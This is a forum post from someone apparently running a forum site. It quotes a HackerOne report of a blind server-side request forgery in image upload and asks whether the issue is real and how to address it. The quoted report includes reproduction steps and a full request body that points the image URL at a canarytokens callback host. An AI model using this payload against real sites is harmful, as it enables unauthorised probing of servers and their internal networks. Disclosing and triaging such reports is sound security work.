We recieved a Hackerone report about the issue below.
What I’m wondering is:
- Is this a problem
- Are there any suggestions / something I can do about it
Summary:
Hi,I have found a blind SSRF on
hxxps://xyz.com/postsendpointSteps To Reproduce:
- Login to your account on xyz.com
- Go to private messages (there will be a greeting message from their discobot)
- While sending a message, upload an image and Intercept the request in burp
- In the payload change the image upload url to your canary url
- The payload will look like this
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- When you send the request, two canary alert will be triggered or check server logs there will be a request made by Ruby user-agent and One from their Amazon Compute Instance
Impact
The vulnerability allows an attacker to make arbitrary HTTP/HTTPS requests inside a xyz.com instance’s network.
From this thread, it seems like this is due to onebox behavior Server-side request forgery vulnerability.
I also saw this hackerone report from years ago SSRF in upload IMG through URL.
Thanks!